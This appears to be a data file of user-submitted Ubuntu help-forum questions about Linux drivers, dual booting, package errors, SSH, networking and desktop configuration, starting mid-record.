capabilities : [ b4 ] vendor specific information : len=14 < ? > capabilities : [ 100 ] virtual channel capabilities : [ 128 ] power budgeting < ? > -- subsystem : evga.com . corp. device [ 3842:1313 ] flags : bus master , fast devsel , latency 0 , irq 19 memory at faf7c000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 kernel driver in use : snd_hda_intel everything seems to be ok except the kernel module which is somehow wrong ... looking at the ui i have the nvidia legacy binary driver from additional drivers installed . and before someone suggests that i try another one . i tried them all ! so if anyone has any idea what is going on here , then please help me . : )
521696	ca n't put content in fastcgi_cache dir	i set up nginx to use the fastcgi_cache parameter . i also set fastcgi_cache_path . and everything works fine . what i tried to do is to manually add a cachedir.tag file in the fastcgi_cache_path dir in order to exclude it from being added in the backup archive my cron script creates . the problem is that content in the fastcgi_cache_path other that nginx-created cache folders is automatically deleted ! wtf ? : p how can i prevent that ?
521697	cron , xconf-query and xubuntu 14.04	i have updated my xubuntu to the 14.04 version . unfortunately , i am experiencing a problem . i have a script , named earth , updating the wallpaper of my desktop . here is the code # ! /bin/sh nice -n 19 /home/hp/.xplanet/download_xplanet_cloudmap -- debug=1 ; nice xplanet -projection rectangular -geometry 1366x768 -window -num_times 1 -output /home/hp/.xplanet/images/earth.png ; # nice xplanet -geometry 1280x1024 -num_times 1 -longitude 15 -latitude 38 -output /home/hp/.xplanet/images/earth.png # gconftool-2 -t string -s /desktop/gnome/background/picture_filename /home/hp/.xplanet/images/earth.png ; xfconf-query -- channel xfce4-desktop -- property /backdrop/screen0/monitor0/image-path -- set `` /home/hp/.xplanet/images/earth.png '' xfconf-query -- channel xfce4-desktop -- property /backdrop/screen0/monitor1/image-path -- set `` /home/hp/.xplanet/images/earth.png '' xfconf-query -- channel xfce4-desktop -- property /backdrop/screen0/monitorlvds-0/workspace0/last-image -- set `` /home/hp/.xplanet/images/earth.png '' when i run the script in a terminal , it works . but , if i add the running of the script to crontab , with the command crontab -e and including the line 00,20,40 * * * * ( export display=:0.0 ; sh /home/hp/.xplanet/earth ) it does n't work . particularly , the commands with xfconf-query do n't run . it worked in xubuntu 12.04 . do you have any suggestions , please ? regards matteo
521698	troubleshooting a kali installation	when i want to install kali linux on vmwareworkstation , i got this problem : http : //docs.kali.org/wp-content/uploads/2013/08/failed-kali-install.png how can i fix it ?
521699	no wireless on kubuntu 14.04/ dell vostro 1540	i recently installed kubuntu 14.04 on my dell vostro 1540 . it recognizes wireless during the installation , but after restart , i ca n't connect via wireless- it does n't keep the connection i created for the installation , and after i recreate , it does n't connect . i found nothing about it in askubuntu and google . i went to the driver manager , and it says it is using : '' broadcom corporation bcm4313 802.11b/g/n wireless lan controller '' . now , it 's the same proprietary driver it 's been using during installation . what 's wrong ? why does n't it work after restart ? and most important of all , how can i make it work ? it worked perfectly with kubuntu 13.10 . any ideas are appreciated . thank you . i ran the command you mentioned ( lsmod | grep ... ) the results are : brcmsmac 563041 0 cordic 12574 1 brcmsmac brcmutil 15618 1 brcmsmac b43 387371 0 mac80211 630653 2 b43 , brcmsmac cfg80211 484040 3 b43 , brcmsmac , mac80211 ssb 62379 1 b43 bcma 52096 3 b43 , brcmsmac thank you
521706	`` error adding symbols : dso missing from command line '' while compiling g13-driver	i 'm trying to compile the download received here : https : //code.google.com/p/linux-g13-driver/ by running make but i 'm receiving errors that to me , after searching on the web , look like they 're the programmers fault but here they are : g++ c-source/g13.o c-source/g13action.o c-source/macro.o c-source/macroaction.o c-source/main.o c-source/output.o c-source/passthroughaction.o -o linux-g13-driver -lusb-1.0 /usr/bin/ld : c-source/main.o : undefined reference to symbol 'pthread_kill @ @ glibc_2.2.5' //lib/x86_64-linux-gnu/libpthread.so.0 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status make : *** [ linux-g13-driver ] error 1 if anyone has any ideas please help i really want to get this running
521707	install app with no install instructions	i 've unpacked tar.gz file and there was no instructions to installation . only executable file that starts a program . is there any way to `` install '' this program to system , or the only way is to make a shortcut to it ?
521709	installing php 5.4 instead of 5.5 on ubuntu server 14.04	any one please suggest commands to install php 5.4 instead of php 5.5 that comes default with ubuntu server 14.04 for some compatibility issues i want to install php 5.4 not 5.5 . i have a fresh server with nothing installed as of now . thanks .
521712	bind media keys to pithos actions	i 've looked through the settings both of the system and of pithos , and it seems there is no way to govern pithos using the media keys ( play/pause , etc. ) . i use pithos more than amarok , so i 'd like to bind the media keys to it instead . i 'm using kubuntu 12.04 . any suggestions ?
521718	malformed line error ca n't open software center	downloaded spotify on 14.04 and now software centre wont open . i got this error line when i entered software center on the terminal : systemerror : e : malformed line 1 in source list /etc/apt/sources.list.d/spotify.list ( dist parse ) this is the full text : amos @ deepthought : ~ $ software-center 2014-09-08 23:45:09,354 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-09-08 23:45:09,602 - softwarecenter.ui.gtk3.app - info - building local database 2014-09-08 23:45:09,603 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in < module > app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 313 , in __init__ self._rebuild_and_reopen_local_db ( pathname ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 532 , in _rebuild_and_reopen_local_db rebuild_database ( pathname , debian_sources , appstream_sources ) file `` /usr/share/software-center/softwarecenter/db/update.py '' , line 1148 , in rebuild_database cache.open ( ) file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 261 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 107 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 155 , in open self._list.read_main_list ( ) systemerror : e : malformed line 1 in source list /etc/apt/sources.list.d/spotify.list ( dist parse ) can anyone please help k
521722	two volumes ? want to merge !	i apologize ahead of time for how confusing this may be . i am very new to things such as partitions , disks , and hard drives . when i installed ubuntu there were two options , install on a 24 gb hd and install on a 750 gb hd , the first time i installed i used the 750 gb hd , but had boot issues . i 'm now using the 24 gb hd but i want to save files to the 750 gb hd . is there a way i can merge the two , or at least merge some of the 750 gb hd to the 24 gb hd ? i 've tried using gparted to merge but ca n't seem to combine the drives . i want the os to remain on the 24 gb hd but i want my files on the 750 gb hd . i could just try to re-route everything to go to the 750 gb volume and leave it at that , but is there an easier way . filesystem size used avail use % mounted on /dev/mapper/ubuntu -- vg-root 16g 3.9g 11g 27 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 2.9g 12k 2.9g 1 % /dev tmpfs 585m 1.2m 584m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.9g 80k 2.9g 1 % /run/shm none 100m 36k 100m 1 % /run/user /dev/sda2 237m 88m 137m 39 % /boot /dev/sda1 511m 3.4m 508m 1 % /boot/efi /dev/sdb2 693g 192k 693g 1 % /media/blah/534e-b317
521723	`` system problem detected apport '' - how to send reports by default ?	i use a lot of wine apps that sometimes cause ui problems . is there anyway i can configure ubuntu to send these reports by default instead of it prompting me every time and me entering the root password each time ? i saw this article from 2012 and was wondering if this paradigm still stands . system : ubuntu 14.04 64bit kernel : 3.13.0-35-generic
521725	error : could n't find home environment when installing a new package . how do i fix it ?	when ever i add a new package i get an error message : /usr/bin/how-can-i-help:29 : in `home ' : could n't find home environment -- expanding `~ ' ( argumenterror ) from /usr/bin/how-can-i-help:29 : in ` < main > ' error in function : does anyone know what i need to map to home ? and , do i map it to the home folder ?
521727	how to clean up/clean out /dev/sda7 when permission is denied ?	d @ d-satellite-c655 : ~ $ df -h filesystem size used avail use % mounted on /dev/sda7 38g 36g 278m 100 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 931m 4.0k 931m 1 % /dev tmpfs 189m 1.1m 188m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 943m 1.4m 942m 1 % /run/shm none 100m 20k 100m 1 % /run/user overflow 1.0m 1.0m 0 100 % /tmp /home/d/.private 38g 36g 278m 100 % /home/d it appears i 've used 100 % of /dev/sda7 , does anyone know how i might go about cleaning it up or emptying it out , being that , since learning this , i 've restarted my computer , and am now unable to log into the administrator account shown above . since then i 've successfully logged into the guest account and : guest-ihp062 @ d-satellite-c655 : ~ $ sudo chmod 755 /dev/sda7 -r sudo : unable to change to sudoers gid : operation not permitted guest-ihp062 @ d-satellite-c655 : ~ $ sudo apt-get autoclean sudo : unable to change to sudoers gid : operation not permitted guest-ihp062 @ d-satellite-c655 : ~ $ login d login : can not possibly work without effective root guest-ihp062 @ d-satellite-c655 : ~ $ sudo passwd root sudo : unable to change to sudoers gid : operation not permitted what am i missing ?
521731	accesing windows 8 directory with fast boot off , not working	i have windows 8 and ubuntu in a dual boot but i ca n't access the windows directory from ubuntu . the error says that windows is in hibernate but i know i did shut it down completely . i know i need to have fast boot disabled . and it is disabled . the weird thing is that it used to work and all of the sudden it does n't anymore . is there anyone who might be able to help me because i ca n't find the solution on google .
521732	ubuntu resolution stuck at 800x600	everything happened after i made sudo apt-get upgrade . since then i can not change the resolution . even in xrandr lvds does not show up . i tried to install nvidia drivers . but i get : e : package 'nvidia-331 ' has no installation candidate e : unable to locate package nvidia-settings-331 by the way , i did everthing i found on the internet . nothing helped . when i try to install nvidia drivers through tty1 , i get : the distribution-provided pre-install script failed ! continue installation anyway ? and when i say yes , then i get error : unable to find the development tool 'cc ' in your path ... i do not how i can reinstall open-source drivers . that could be an alternative solution ... i really do not know what to do ; in a few they i have a very important presentation and i can not format my os now . any help is highly appreciated .
521733	how to activate wifi hotspot for dell inspiron n5110	how to create hotspot in ubuntu14.04.my laptop supports hotspot . my lap top is dell inspironn5110 , please help ?
521735	installing oracle java versions	i went to the website to download ( java platform ( jdk ) 8u20 ) , http : //www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html to download oracle java for my machine . i was confused which packages are necessary for me . the command uname -a shows linux xxx 3.13.0-35-generic # 62-ubuntu smp fri aug 15 01:58:42 utc 2014 x86_64 x86_64 x86_64 gnu/linux please suggest me what are the packages i should download and install for oracle java .
521737	copying animated gif to clipboard from command line	i have tried to use xclip to populate the clipboard , but the image looses animation when i paste . i am on ubuntu 14.04 i tried copying using xclip xclip -selection clipboard -t image/png -i > /tmp/foo.gif xclip -selection clipboard -t image/gif -i > /tmp/foo.gif i have also tried to copy using the gnome image viewer with same results . note : the issue might be specific to chrome : http : //www.reddit.com/r/chrome/comments/21bh5d/how_come_chrome_cant_copypaste_a_gif/
521739	ubuntu/windows 7 dual boot not working ( 2 hdd 's )	i recently installed ubuntu on my spare hard drive ( i have two , one of which was unused ) and for some reason it never dual boots properly . gnu grub always shows up when the computer starts up , but never displays windows 7 ( i 've edited the grub .cfg to boot to windows 7 manually ) . i would prefer to have windows 7 boot up by default , but if i have to select the os upon startup that is no big deal . i have already asked this question on tomshardware.com in a more detailed form ( http : //www.tomshardware.com/answers/id-2291184/ubuntu-windows-dual-boot-issues.html ) but questions can sometimes take weeks to get answered there , so i figured i 'd try here . tl ; dr i have 2 hard drives , one with ubuntu , one with windows 7 . i want it to boot to windows by default , but the gnu grub bit does n't show windows when i start it up . any assistance is appreciated , thank you in advance . edit : my issue was resolved , the solution can be found here : http : //www.tomshardware.com/answers/id-2291184/ubuntu-windows-dual-boot-issues.html # 14136824
521741	change the language of date display	i recently installed 14.04 , and my date/time display is unnecessarily localized . upon installation , i chose colombo as my location : now the date/time is displayed in localized form ( sinhala language ) . i do n't remember choosing a language any other than english ( us ) . how do i revert this to show date/time display in english ( us ) ? edit : executing locale on console produces following : lang=en_us.utf-8 language=en_us lc_ctype= '' en_us.utf-8 '' lc_numeric=si_lk lc_time=si_lk lc_collate= '' en_us.utf-8 '' lc_monetary=si_lk lc_messages= '' en_us.utf-8 '' lc_paper=si_lk lc_name=si_lk lc_address=si_lk lc_telephone=si_lk lc_measurement=si_lk lc_identification=si_lk lc_all=
521742	installing libtiff.so.3 on ubuntu 14.04	i need to run dtk ( http : //trackvis.org/ ) on my ubuntu 14.04 but when i try to execute dtk i get the error error while loading shared libraries : libtiff.so.3 : can not open shared object file : no such file or directory i tried installing libtiff.so.4 as somebody suggested but the problem continues and i still get the same error . when i try to run sudo apt-get libtiff.so.4 i get reading package lists ... done building dependency tree reading state information ... done libtiff4 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 101 not upgraded . how can i install this tiff package ?
521743	window 7 and ubuntu dual boot failure	i 've read several threads and i do n't believe this is a duplicate , seems to be a unique problem . here 's what i did : windows 7 32-bit installed ( success ) unbuntu 14.04.1 64-bit installed from live cd iso ( success ) ( ubuntu was installed side-by-side , new ext4 partitions created automatically ) ( did not create additional swap partition ) ( i do not know if i am using grub or grub2 ) grub loads upon restart ( success ) from grub , select ubuntu ( success - ubuntu loads ) from grub , select windows ( failure - complains about problem with master boot record ) use windows 7 32-bit recovery cd to run bootrec /fixmbr ( success - recovery ) windows 7 now boots again every time ( success ) , but can not boot into ubunto ( failure ) so right now , ubuntu is still installed sitting in its own partition . grub is `` turned off '' . windows boot loader is `` turned on '' , but only detects windows . windows 7 loads successfully every time . if i use grub , i can launch ubuntu but it fails to launch windows 7 . if i use windows boot loader , i can launch windows but it does n't even detect ubuntu ( offers no choice for dual boot ) . what do i need to do to achieve dual boot ? can i somehow update windows boot loader to `` detect '' ubuntu and offer the choice for either windows 7 or ubuntu ? can i somehow turn on grub again and have it successfully launch windows 7 or ubuntu ? should i delete the ubuntu partitions and start allover ? if so , what should i do differently ? any help appreciated , this is my first go at dual boot .
521744	ubuntu 14.04 , ca n't connect to one particular ( belkin ) wireless router	i have a dell vostro 1500 laptop with dual boot xp and ubuntu 14.04 and with a dell wireless 1505 draft 802.11n wlan mini-card network adapter . the driver for the adapter is described as a âbroadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source ( proprietary ) â . i recently acquired a belkin n300 wireless router ( model f9k1002 ) but ca n't connect to it in ubuntu . i have had no trouble connecting to two other wireless routers in ubuntu . the xp installation on the same laptop connects easily to the belkin router and , through it , the internet . i 've turned off the router 's firewall and encryption entirely and am still unable to connect . a wired connection works fine . a listing of relevant system data can be found here : http : //pastebin.ubuntu.com/8295229/ any suggestions ?
521746	failed to install ubuntu in windows 7	ubuntu installation is restarting and its not comepleting , after installing windows 7 . this was happening after selecting the option called `` install ubuntu along side windows7 ''
521748	i ran matlab as root and now it shows me an error when i run it without root	i ran matlab using sudo because it would give me an error while setting a path . after that session , i can not run it without root . it gives me the error dialog shown in the image . how can i resolve this issue ? edit : i ran chmod 666 on the .matlab/r2013a directory . that solves the issue , but was that the right step to take ?
521749	how to move and resize ubuntu 's ext4 and linux-swap logical partitions ?	edit : ended up fiddling around and found this out : i needed to delete the swap partition , add the unallocated space to the extended partition , then add the unallocated space to my ext4 partition before creating a new swap partition . i do n't remember resizing my ubuntu partition as being this overly complicated , though .
521750	how can i use pitch and speed control for audio cds ?	on the inner flap of a cd i just purchased and encoded to flac , there was a note saying that in order to experience the music at the appropriate pitch level ( important for classical music ) , the pitch has to be adjusted by -3 % , resulting in a similar decrease in tempo , which is also appropriate . how can i obtain the decrease in pitch and speed when playing back the .flac files ? doing it via cli would be a plus but not necessary . note : not the same as how can i modify the pitch of my audio output ? , ubuntu audio pitch shifting filter , how to control banshee playback speed ? , music/podcast player with speed control ? , or any other question that requires pitch is affected but not speed , or vice versa . also , i am not asking about changing the system-wide audio pitch and speed .
521751	locked out of ubuntu 14.04.1 ( ca n't login with right password )	i am locked out of my main account , which i worked a lot on today . i am running dual boot windows 7 x64-bit , and i modified my grub to set the default to windows 7 . whenever i try to log into my main account , i put the right password in , but it flashes to a black screen and then back to the login screen . i created another account and gave root to it , but i still can not get into my main account which i really need to get into . i 've even tried changing my password ! i reset my reset my profile and bashrc , reinstalled xorg , deleted my xauthority , nothing worked .
521752	graphics cards nvidia corporation c61 [ geforce 6150se nforce 430 ] cuda	so i 'm having troubles . 00:0d.0 vga compatible controller [ 0300 ] : nvidia corporation c61 [ geforce 6150se nforce 430 ] [ 10de:03d0 ] ( rev a2 ) i do n't think i have the right graphics drivers . i updated my driver and did hours of research about my computer . went to the geforce website and looked up my product . downloaded the ppa and updated , and got the most resent update . only to find out that my graphics card is a hybrid from cuda . so is my computer compatible for ubuntu ? i looked in the additional driver thing and it says using x.org x sever -- nouveau display driver from xserver-xorg-video-nouveau ( open source ) but i also found more resent updated cards . used them but they crash most of the time . or i 'll start up and get a split screen . i really do n't want to go back to windows , my computer is a hp pavilion slimline s5600 desktop pc series they tell me to update the kernel is that what i have to do and how would i go about doing that
521753	website sometimes wo n't load	i 'm not sure if this is the proper forum that i can use to address my concern . i was working on a server and suddenly the client reported that the site stopped to load awhile ago and now it 's working fine , i tried to run the command `` free -m '' here are the results : total used free shared buffers cached mem : 495 424 71 0 123 154 -/+ buffers/cache : 146 349 also here is the `` ps aux '' results : user pid % cpu % mem vsz rss tty stat start time command root 1 0.0 0.3 3508 1824 ? ss aug25 0:07 /sbin/init root 2 0.0 0.0 0 0 ? s aug25 0:00 [ kthreadd ] root 3 0.0 0.0 0 0 ? s aug25 0:12 [ ksoftirqd/0 ] root 5 0.0 0.0 0 0 ? s aug25 0:00 [ kworker/u:0 ] root 6 0.0 0.0 0 0 ? s aug25 0:00 [ migration/0 ] root 7 0.0 0.0 0 0 ? s aug25 0:10 [ watchdog/0 ] root 8 0.0 0.0 0 0 ? s < aug25 0:00 [ cpuset ] root 9 0.0 0.0 0 0 ? s < aug25 0:00 [ khelper ] root 10 0.0 0.0 0 0 ? s aug25 0:00 [ kdevtmpfs ] root 11 0.0 0.0 0 0 ? s < aug25 0:00 [ netns ] root 12 0.0 0.0 0 0 ? s aug25 0:03 [ sync_supers ] root 13 0.0 0.0 0 0 ? s aug25 0:00 [ bdi-default ] root 14 0.0 0.0 0 0 ? s < aug25 0:00 [ kintegrityd ] root 15 0.0 0.0 0 0 ? s < aug25 0:00 [ kblockd ] root 16 0.0 0.0 0 0 ? s < aug25 0:00 [ ata_sff ] root 17 0.0 0.0 0 0 ? s aug25 0:00 [ khubd ] root 18 0.0 0.0 0 0 ? s < aug25 0:00 [ md ] root 20 0.0 0.0 0 0 ? s aug25 0:00 [ kworker/u:1 ] root 21 0.0 0.0 0 0 ? s aug25 0:00 [ khungtaskd ] root 22 0.0 0.0 0 0 ? s aug25 0:00 [ kswapd0 ] root 23 0.0 0.0 0 0 ? sn aug25 0:00 [ ksmd ] root 24 0.0 0.0 0 0 ? s aug25 0:00 [ fsnotify_mark ] root 25 0.0 0.0 0 0 ? s aug25 0:00 [ ecryptfs-kthrea ] root 26 0.0 0.0 0 0 ? s < aug25 0:00 [ crypto ] root 34 0.0 0.0 0 0 ? s < aug25 0:00 [ kthrotld ] root 37 0.0 0.0 0 0 ? s aug25 0:00 [ scsi_eh_0 ] root 38 0.0 0.0 0 0 ? s aug25 0:00 [ scsi_eh_1 ] root 58 0.0 0.0 0 0 ? s < aug25 0:00 [ devfreq_wq ] root 247 0.0 0.0 0 0 ? s aug25 0:09 [ jbd2/vda-8 ] root 248 0.0 0.0 0 0 ? s < aug25 0:00 [ ext4-dio-unwrit ] root 314 0.0 0.1 2816 596 ? s aug25 0:00 upstart-udev-bridge -- daemon root 316 0.0 0.2 2956 1120 ? ss aug25 0:00 /sbin/udevd -- daemon 102 377 0.0 0.1 3240 620 ? ss aug25 0:00 dbus-daemon -- system -- fork -- activation=upstart syslog 388 0.0 0.6 31988 3132 ? sl aug25 2:15 rsyslogd -c5 root 445 0.0 0.1 2952 664 ? s aug25 0:00 /sbin/udevd -- daemon root 446 0.0 0.1 2952 664 ? s aug25 0:00 /sbin/udevd -- daemon root 464 0.0 0.0 0 0 ? s < aug25 0:00 [ kpsmoused ] root 520 0.0 0.4 6664 2368 ? ss aug25 0:26 /usr/sbin/sshd -d root 599 0.0 0.1 4612 788 tty4 ss+ aug25 0:00 /sbin/getty -8 38400 tty4 root 600 0.0 0.1 4612 796 tty5 ss+ aug25 0:00 /sbin/getty -8 38400 tty5 root 617 0.0 0.1 4612 796 tty2 ss+ aug25 0:00 /sbin/getty -8 38400 tty2 root 618 0.0 0.1 4612 792 tty3 ss+ aug25 0:00 /sbin/getty -8 38400 tty3 root 624 0.0 0.1 4612 796 tty6 ss+ aug25 0:00 /sbin/getty -8 38400 tty6 root 626 0.0 0.6 36328 3356 ? ss aug25 1:01 php-fpm : master process ( /etc/php5/fpm/php-fpm.conf ) www-data 627 0.0 0.5 36328 2764 ? s aug25 0:00 php-fpm : pool www www-data 628 0.0 0.5 36328 2764 ? s aug25 0:00 php-fpm : pool www root 640 0.0 0.1 2156 588 ? ss aug25 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket root 641 0.0 0.1 2600 880 ? ss aug25 0:02 cron daemon 642 0.0 0.0 2452 352 ? ss aug25 0:00 atd root 663 0.0 0.0 2828 396 ? s aug25 0:00 upstart-socket-bridge -- daemon root 698 0.0 1.8 39516 9324 ? ss aug25 1:08 /usr/sbin/apache2 -k start root 761 0.0 0.1 4612 788 tty1 ss+ aug25 0:00 /sbin/getty -8 38400 tty1 mysql 7173 0.0 8.5 303756 43484 ? ssl aug26 6:17 /usr/sbin/mysqld www-data 18768 0.0 2.3 41960 12148 ? s sep08 0:03 /usr/sbin/apache2 -k start www-data 18911 0.0 3.9 49320 19920 ? s sep08 0:02 /usr/sbin/apache2 -k start www-data 19047 0.0 3.9 49328 19896 ? s sep08 0:02 /usr/sbin/apache2 -k start www-data 19091 0.0 3.9 49320 19856 ? s sep08 0:02 /usr/sbin/apache2 -k start root 19350 0.0 0.0 0 0 ? s 00:16 0:00 [ flush-253:0 ] www-data 19495 0.0 2.6 43800 13464 ? s 02:09 0:00 /usr/sbin/apache2 -k start www-data 19510 0.0 3.8 49560 19736 ? s 02:09 0:00 /usr/sbin/apache2 -k start www-data 19521 0.0 2.6 43800 13372 ? s 02:14 0:00 /usr/sbin/apache2 -k start www-data 19523 0.0 1.1 40016 5868 ? s 02:14 0:00 /usr/sbin/apache2 -k start www-data 19541 0.0 0.9 39564 5016 ? s 02:21 0:00 /usr/sbin/apache2 -k start www-data 19543 0.0 0.9 39548 4772 ? s 02:21 0:00 /usr/sbin/apache2 -k start root 19546 0.0 0.6 11384 3396 ? ss 02:24 0:00 sshd : root @ notty root 19559 0.0 0.1 2412 784 ? ss 02:24 0:00 /usr/lib/openssh/sftp-server root 19563 0.0 0.6 11472 3496 ? ss 02:26 0:00 sshd : root @ pts/0 root 19576 0.0 0.6 6788 3148 pts/0 ss+ 02:27 0:00 -bash root 19643 0.0 0.0 0 0 ? s 02:36 0:00 [ kworker/0:0 ] root 19662 0.0 0.0 0 0 ? s 02:41 0:00 [ kworker/0:2 ] root 19667 0.0 0.0 0 0 ? s 02:46 0:00 [ kworker/0:1 ] root 19668 0.0 0.6 11384 3396 ? ss 02:46 0:00 sshd : root @ pts/2 root 19681 0.3 0.6 6788 3140 pts/2 ss 02:47 0:00 -bash root 19741 0.0 0.2 4928 1124 pts/2 r+ 02:48 0:00 ps aux not really good with server analysis yet but i was really thinking of increasing the memory capacity of the server instead . currently it 's running using 512mb of memory . do you think it 's going to be reasonable for me to increase the memory size ? or is there anything else that i should check before the initial action ?
521755	can not login and connect internet via proxy after upgrade from 12.04.05 to 14.04.01	i got two problems after upgrade from 12.04 to 14.01 , can not connect internet via proxy although i set it in /etc/apt/apt.conf can not login into lightdm , it asked password and looping . i change the permission of /home/user and chown-ing .xauthority need your help , folks .
521756	passwordless ssh not working ?	i set up passwordless ssh between my ubuntu 14.04 desktop laptop and my server running ubuntu server 14.04 . it was all working . then , i rebooted my server , and after that it stopped working . i tried generating new keys and copying them again , checking the sshd_config serveral times , and fixing permissions for the .ssh folder , but nothing is working . i set the sshd_config log level to debug , and this line appears whenever i try to connect : sep 8 20:06:16 hostname sshd [ 19724 ] : debug1 : trying public key file /home/me/.ssh/authorized_keys sep 8 20:06:16 hostname sshd [ 19724 ] : debug1 : could not open authorized keys '/home/me/.ssh/authorized_keys ' : no such file or directory obviously it does not access the authorized keys file to check my key . i tried deleting the .ssh folder so it would recreate it , and it did , but still failed to find the file . i tried fixing the permissions many times , and nothing is working .
521757	control brightness on satellite pro c845	i have a toshiba satellite pro c845 con intel core i5 and i can use the function keys to mute sound or increase and decrease , but the brightnes keys does not work , to decrease is fn + f2 and to increase fn + f3 , but if i press fn + f3 it suspend my laptop . any idea or suggestion please . im using ubuntu 12.04 . thanks
521758	web browser can not load the facebook homepage , all other homepages work fine	my web browser can not load the facebook homepage ( unable to connect firefox ca n't establish a connection to the server at www.facebook.com . ) , all other web sites work just fine . i use firefox , but i installed chrome and the same thing happens . i checked my add-ons and they 're not the problem either . of course i deinstalled firefox and re-installed from the software centre . not helping either . i tried to use an add-on that changes my ip-address and it helped - but it slowed down my internet and was no real solution . also , when i delete the facebook homepage from my history ( `` history '' / '' view all history '' and then right mouse click `` forget about this site '' ) , the first time i hit the page it works - i can connect and surf for a couple of clicks . but whenever i open the page again , the same thing happens over again and i can not connect . then , i have reset firefox to its default state and it can not solve the problem for longer either . now , i have read about similar problems on a lot of forums , but many of the proposed solutions were aiming at windows or mac , not ubuntu . ( e.g . http : //www.techsupportforum.com/forums/f120/solved-facebook-wont-load-on-any-browser-655477.html ) there is talks about malware and i find it sounds like it could be something like that - but i do n't have much of an understanding in how far this can affect an ubuntu computer or what i could do/how i could even find out if my computer is infected . do any of you have ideas what could be the problem - or best , what could be the solution ? i am not exactly a computer crack , so please keep it simple when you 're explaining . and thank you very much already !
521759	can we set up a shortcut to run latex in libreofiice ?	in using texmaths in libreofiice we always have to click the button `` latex '' so as to display what we type . however , it is cumbersome to click and click the mouse . i have found no shortcut for clicking `` latex '' , so i am wondering can we manually set up a keyboard shortcut for running latex ? thanks so much for your immeasurable help !
521760	changing wireless settings	i need to know how to access and edit the settings of this equivalent in linux ( lubuntu ) . these are the instructions i need to follow in windows 7 to fix my equivalent problem in linux . instructions : 1 . go to the device manager 2 . network adapters 3 . wireless adapters 802.11n mode - //disable this mixed mode protection to enabled roam aggressiveness to 5 wireless mode to 3 '' thank you for your help ! i really want to be able to use lubuntu . for reference my computer is an asus u30jc .
521762	how do i move an icon from the desktop to the menu in gnome flashback ?	i have an icon for photoshop that was added to my desktop by play on linux . i 'd rather have that icon be in the graphics submenu of my main menu . how do i move it ?
521763	phpmyadmin configuration problem	after logging in into my account i saw this warning : http : //pastebin.com/z8hph8wt i tried these steps the phpmyadmin configuration storage is not completely configured and still i 've got the same problem . please help me .
521765	authentication at ubuntu 12.04	when i try to install updates in ubuntu 12.04 lts , i see a pop-up asking for an authentication password . i have typed my root password but it is not working . how do i solve this problem ?
521767	problem after updating ubuntu 12.04	i have currently ubuntu 12.04 and trying to update . after updating , when i restart the system it does not showing the pane and also not terminal
521770	error : parsing file '/var/lib/dpkg/updates/0001 ' near line 0 : newline in field name ` # padding '	i was try to install mono using the following command : sudo apt-get install mono-* i closed the terminal while it was installing . i restarted the install , and i got the error message : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) i so far tried running these commands : sudo rm /var/lib/apt/lists/lock sudo rm /var/cache/apt/archives/lock i am now getting the following error message : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . i then used sudo dpkg -- configure -a , but now i am getting the following error : dpkg : error : parsing file '/var/lib/dpkg/updates/0001 ' near line 0 : newline in field name ` # padding ' '' ** i also tried cd /var/lib/dpkg/updates & & rm -rf 0045 and sudo dpkg -- configure -a , but that was no use . how do i fix this one ?
521775	how do i correct boot problems with installation on a uefi windows 8.1 system ?	i have semi-successfully installed uberstudent 4.0 on a uefi windows 8.1 system , but i need help correcting whatever error i have made . ( i assume i have made an error somewhere , since i had to take bits and pieces from a few different tutorials , as some steps failed after i had already begun the installation . ) system info : acer e5-571-563b intel core i5 1.7ghz , 2.7ghz turbo 6gb ddr3l ram 1tb hd boot repair/boot info . http : //paste2.org/xjhyx9bl here 's the summary . i began to install following the instructions @ http : //www.everydaylinuxuser.com/2014/05/install-ubuntu-1404-alongside-windows.html this tutorial worked until i got a 'no usb boot ' error . i later discovered that my system was rejecting the pendrivelinux usb that i created . ( flash drive was confirmed functional on another computer . ) linuxlive usb creator did work on my system . this is where things began to go wrong . i began searching for more tutorials about installing linux on uefi windows systems . to complicate things , i do not have a records of the exact tutorials that i located due to several attempts and two windows resets . currently , the system will boot into windows with uefi enabled , regardless of whether secure boot is enabled or disabled , although i get a text selection menu not unlike grub which i believe is remnants of the easy bcd menu that i nearly had working on an earlier attempt that was n't removed when i reset windows . ( of course , uberstudent will not boot from this menu , since uefi is enabled , and i apparently installed in legacy . ) the system will boot into a grub menu when legacy is enabled , although i do n't get a windows option . i assume that this is due to uefi . i am looking to correct this , so i can dual boot more smoothly . i need to keep windows functional , since i still have to rely on it for a few items such as my canon printers and security cameras . otherwise , i would simply scrap windows , but my linux knowledge is not to a sufficient level to do so quite yet . i would prefer to fix this using the method i found on youtube , `` how to dual boot windows and linux . ( the nontraditional way ) '' -using easybcd , as he describes this as a way to make your install less susceptible to windows updated breaking grub , but a simple grub menu would beat having to change settings to reboot in a different os . any advice would be greatly appreciated .
